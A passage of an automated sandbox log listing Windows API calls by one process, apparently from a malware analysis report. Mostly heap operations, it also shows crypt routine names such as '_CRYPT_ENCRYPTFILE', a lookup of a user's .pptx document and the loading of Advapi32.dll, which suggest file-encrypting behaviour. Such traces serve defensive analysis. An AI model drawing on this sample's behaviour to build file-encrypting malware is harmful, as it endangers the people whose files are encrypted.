hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.903] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0077.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0077.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0077.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0077.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0077.907] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0077.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0077.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.909] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b82780, ftCreationTime.dwHighDateTime=0x1d5d777, ftLastAccessTime.dwLowDateTime=0x5e34c700, ftLastAccessTime.dwHighDateTime=0x1d59cd2, ftLastWriteTime.dwLowDateTime=0x5e34c700, ftLastWriteTime.dwHighDateTime=0x1d59cd2, nFileSizeHigh=0x0, nFileSizeLow=0x15a35, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="QjLwz6.pptx", cAlternateFileName="QJLWZ6~1.PPT")) returned 0x41ac2c0 [0077.909] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0077.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.910] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.910] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0077.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0077.910] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0077.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.911] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.911] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.912] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0077.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.912] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.913] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.913] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.914] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.914] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0077.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 